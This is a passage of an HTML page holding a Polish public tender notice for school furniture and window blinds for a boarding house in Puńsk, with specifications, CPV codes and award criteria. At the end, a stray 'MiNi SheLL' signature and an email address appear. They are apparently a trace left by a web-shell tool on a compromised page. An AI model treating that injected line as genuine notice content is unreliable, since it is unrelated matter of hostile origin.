2. Szafy dwudrzwiowe typu ubraniowego z półkami i wieszakami - 6 szt.
3. Krzesła - 15 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Stoliki klasowe - 20 szt.
- nogi stalowe z profilu okrągłego/kwadratowego mocowane do ramy, blat z płyty co najmniej 18 mm dwustronnie laminowanej - krawędzie oklejone 2 mm obrzeżem PCV. Stoły o wymiarach od: długość: 180-200 oraz szerokości od 70/80 cm, o standardowej wysokości, w kolorze olchy.

2. Szafy dwudrzwiowe typu ubraniowego z półkami i wieszakami - 6 szt.
- 3 szafy przeznaczone na segregatory A-4, wysokość/szerokość/głębokość ok. 180/80/40 (+- 4 cm)
		- 3 szafy typu ubraniowego z wieszakami na ubrania, wysokość/szerokość/głębokość ok. 180/80/60 (+- 4 cm)
		- wykonane z płyty laminowanej w kolorze olcha
		- zamykane na zamek

3. Krzesła - 15 szt.
- tapicerowane siedzisko i oparcie koloru ciemno-szarego lub brązowego. Metalowa rama, chromowana lub malowana. Możliwość składowania w stosie do 10 szt. 

4. Rolety do okien - szerokość 2,80 m - 5 szt.,
Gramatura 160 - 180 gr/m2
Kolor uzgodniony zostanie w trakcie realizacji dostawy. 

Wykonawca dostarczy wyposażenie transportem własnym do internatu Liceum Ogólnokształcącego z Litewskim Językiem Nauczania im. 11 Marca w Puńsku, ul. 11 Marca 16A..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.14.33.10-2, 39.13.21.00-7, 39.11.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com